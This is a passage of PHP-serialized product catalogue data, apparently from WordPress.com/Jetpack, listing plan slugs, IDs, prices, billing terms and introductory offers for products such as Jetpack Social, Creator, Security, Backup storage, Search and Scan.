Basic\";s:12:\"product_slug\";s:22:\"jetpack_social_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:14:\"jetpack-social\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$12.00\";s:21:\"combined_cost_display\";s:3:\"$12\";s:4:\"cost\";i:12;s:18:\"cost_smallest_unit\";i:1200;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_basic_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2503;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:27:\"jetpack_social_basic_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:28:\"jetpack_social_basic_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2504;s:12:\"product_name\";s:20:\"Jetpack Social Basic\";s:12:\"product_slug\";s:28:\"jetpack_social_basic_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"jetpack-social-basic-yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"jetpack_social_advanced_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2602;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:30:\"jetpack_social_advanced_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:31:\"jetpack_social_advanced_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2603;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:31:\"jetpack_social_advanced_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:33:\"jetpack_social_advanced_bi_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:2604;s:12:\"product_name\";s:30:\"Jetpack Social Advanced (Beta)\";s:12:\"product_slug\";s:33:\"jetpack_social_advanced_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"jetpack-social-advanced\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$238.80\";s:21:\"combined_cost_display\";s:7:\"$238.80\";s:4:\"cost\";d:238.80000000000001136868377216160297393798828125;s:18:\"cost_smallest_unit\";i:23880;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:24:\"jetpack_social_v1_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2605;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:24:\"jetpack_social_v1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-social-v1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:59.39999999999999857891452847979962825775146484375;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:25:\"jetpack_social_v1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2606;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:25:\"jetpack_social_v1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-social-v1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$14.95\";s:21:\"combined_cost_display\";s:6:\"$14.95\";s:4:\"cost\";d:14.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"jetpack_social_v1_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2607;s:12:\"product_name\";s:14:\"Jetpack Social\";s:12:\"product_slug\";s:27:\"jetpack_social_v1_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:17:\"jetpack-social-v1\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$191.04\";s:21:\"combined_cost_display\";s:7:\"$191.04\";s:4:\"cost\";d:191.039999999999992041921359486877918243408203125;s:18:\"cost_smallest_unit\";i:19104;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:143.039999999999992041921359486877918243408203125;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:5:\"$7.96\";}s:23:\"jetpack_creator_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2610;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:23:\"jetpack_creator_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-creator\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:22:\"jetpack_creator_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2611;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:22:\"jetpack_creator_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-creator\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:1;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:119.400000000000005684341886080801486968994140625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:25:\"jetpack_creator_bi_yearly\";O:8:\"stdClass\":21:{s:10:\"product_id\";i:2612;s:12:\"product_name\";s:15:\"Jetpack Creator\";s:12:\"product_slug\";s:25:\"jetpack_creator_bi_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:15:\"jetpack-creator\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$383.04\";s:21:\"combined_cost_display\";s:7:\"$383.04\";s:4:\"cost\";d:383.04000000000002046363078989088535308837890625;s:18:\"cost_smallest_unit\";i:38304;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:9:\"two years\";s:22:\"product_term_localized\";s:9:\"two years\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:18:\"introductory_offer\";O:8:\"stdClass\":7:{s:13:\"interval_unit\";s:4:\"year\";s:14:\"interval_count\";i:2;s:11:\"usage_limit\";N;s:17:\"cost_per_interval\";d:287.04000000000002046363078989088535308837890625;s:30:\"transition_after_renewal_count\";i:0;s:30:\"should_prorate_when_offer_ends\";b:0;s:6:\"reason\";N;}s:22:\"cost_per_month_display\";s:6:\"$15.96\";}s:29:\"jetpack_golden_token_lifetime\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:2900;s:12:\"product_name\";s:20:\"Jetpack Golden Token\";s:12:\"product_slug\";s:29:\"jetpack_golden_token_lifetime\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:0;s:20:\"billing_product_slug\";s:20:\"jetpack-golden-token\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$0.00\";s:21:\"combined_cost_display\";s:2:\"$0\";s:4:\"cost\";i:0;s:18:\"cost_smallest_unit\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:8:\"one time\";s:22:\"product_term_localized\";s:8:\"one time\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jetpack_complete_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3302;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:27:\"a4a_jetpack_complete_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jetpack_complete_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$299.40\";s:21:\"combined_cost_display\";s:7:\"$299.40\";s:4:\"cost\";d:299.3999999999999772626324556767940521240234375;s:18:\"cost_smallest_unit\";i:29940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$24.95\";}s:28:\"a4a_jetpack_complete_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3303;s:12:\"product_name\";s:16:\"Jetpack Complete\";s:12:\"product_slug\";s:28:\"a4a_jetpack_complete_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jetpack_complete_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$24.95\";s:21:\"combined_cost_display\";s:6:\"$24.95\";s:4:\"cost\";d:24.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"a4a_jetpack_security_t1_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3304;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:30:\"a4a_jetpack_security_t1_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$119.40\";s:21:\"combined_cost_display\";s:7:\"$119.40\";s:4:\"cost\";d:119.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:11940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$9.95\";}s:31:\"a4a_jetpack_security_t1_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3305;s:12:\"product_name\";s:23:\"Jetpack Security (10GB)\";s:12:\"product_slug\";s:31:\"a4a_jetpack_security_t1_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t1_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:30:\"a4a_jetpack_security_t2_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3306;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:30:\"a4a_jetpack_security_t2_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$239.40\";s:21:\"combined_cost_display\";s:7:\"$239.40\";s:4:\"cost\";d:239.400000000000005684341886080801486968994140625;s:18:\"cost_smallest_unit\";i:23940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:6:\"$19.95\";}s:31:\"a4a_jetpack_security_t2_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3307;s:12:\"product_name\";s:22:\"Jetpack Security (1TB)\";s:12:\"product_slug\";s:31:\"a4a_jetpack_security_t2_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:30:\"a4a_jetpack_security_t2_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jpb_storage_10gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3309;s:12:\"product_name\";s:34:\"Jetpack Backup Add-on Storage 10GB\";s:12:\"product_slug\";s:28:\"a4a_jpb_storage_10gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:28:\"a4a_jpb_storage_10gb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$2.95\";s:21:\"combined_cost_display\";s:5:\"$2.95\";s:4:\"cost\";d:2.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:295;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:29:\"a4a_jpb_storage_100gb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3311;s:12:\"product_name\";s:35:\"Jetpack Backup Add-on Storage 100GB\";s:12:\"product_slug\";s:29:\"a4a_jpb_storage_100gb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:29:\"a4a_jpb_storage_100gb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$5.95\";s:21:\"combined_cost_display\";s:5:\"$5.95\";s:4:\"cost\";d:5.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:595;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jpb_storage_1tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3313;s:12:\"product_name\";s:33:\"Jetpack Backup Add-on Storage 1TB\";s:12:\"product_slug\";s:27:\"a4a_jpb_storage_1tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jpb_storage_1tb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$9.95\";s:21:\"combined_cost_display\";s:5:\"$9.95\";s:4:\"cost\";d:9.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jpb_storage_3tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3315;s:12:\"product_name\";s:33:\"Jetpack Backup Add-on Storage 3TB\";s:12:\"product_slug\";s:27:\"a4a_jpb_storage_3tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jpb_storage_3tb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$19.95\";s:21:\"combined_cost_display\";s:6:\"$19.95\";s:4:\"cost\";d:19.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:1995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:27:\"a4a_jpb_storage_5tb_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3317;s:12:\"product_name\";s:33:\"Jetpack Backup Add-on Storage 5TB\";s:12:\"product_slug\";s:27:\"a4a_jpb_storage_5tb_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:27:\"a4a_jpb_storage_5tb_monthly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$29.95\";s:21:\"combined_cost_display\";s:6:\"$29.95\";s:4:\"cost\";d:29.949999999999999289457264239899814128875732421875;s:18:\"cost_smallest_unit\";i:2995;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:25:\"a4a_jetpack_search_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3318;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:25:\"a4a_jetpack_search_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"a4a_jetpack_search_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$100.00\";s:21:\"combined_cost_display\";s:4:\"$100\";s:4:\"cost\";i:100;s:18:\"cost_smallest_unit\";i:10000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$8.33\";}s:26:\"a4a_jetpack_search_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3319;s:12:\"product_name\";s:14:\"Jetpack Search\";s:12:\"product_slug\";s:26:\"a4a_jetpack_search_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:25:\"a4a_jetpack_search_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$8.25\";s:21:\"combined_cost_display\";s:5:\"$8.25\";s:4:\"cost\";d:8.25;s:18:\"cost_smallest_unit\";i:825;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:23:\"a4a_jetpack_scan_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3320;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:23:\"a4a_jetpack_scan_yearly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"a4a_jetpack_scan_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:6:\"$59.40\";s:21:\"combined_cost_display\";s:6:\"$59.40\";s:4:\"cost\";d:59.39999999999999857891452847979962825775146484375;s:18:\"cost_smallest_unit\";i:5940;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:22:\"product_term_localized\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";s:22:\"cost_per_month_display\";s:5:\"$4.95\";}s:24:\"a4a_jetpack_scan_monthly\";O:8:\"stdClass\":19:{s:10:\"product_id\";i:3321;s:12:\"product_name\";s:18:\"Jetpack Scan Daily\";s:12:\"product_slug\";s:24:\"a4a_jetpack_scan_monthly\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:10:\"a4a_agency\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:23:\"a4a_jetpack_scan_yearly\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:5:\"$4.95\";s:21:\"combined_cost_display\";s:5:\"$4.95\";s:4:\"cost\";d:4.95000000000000017763568394002504646778106689453125;s:18:\"cost_smallest_unit\";i:495;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:5:\"month\";s:22:\"product_term_localized\";s:5:\"month\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}s:28:\"a4a_jetpack_anti_spam_yearly\";O:8:\"stdClass\":20:{s:10:\"product_id\";i:3322;s:12:\"product_name\";s:17:\"Jetpack 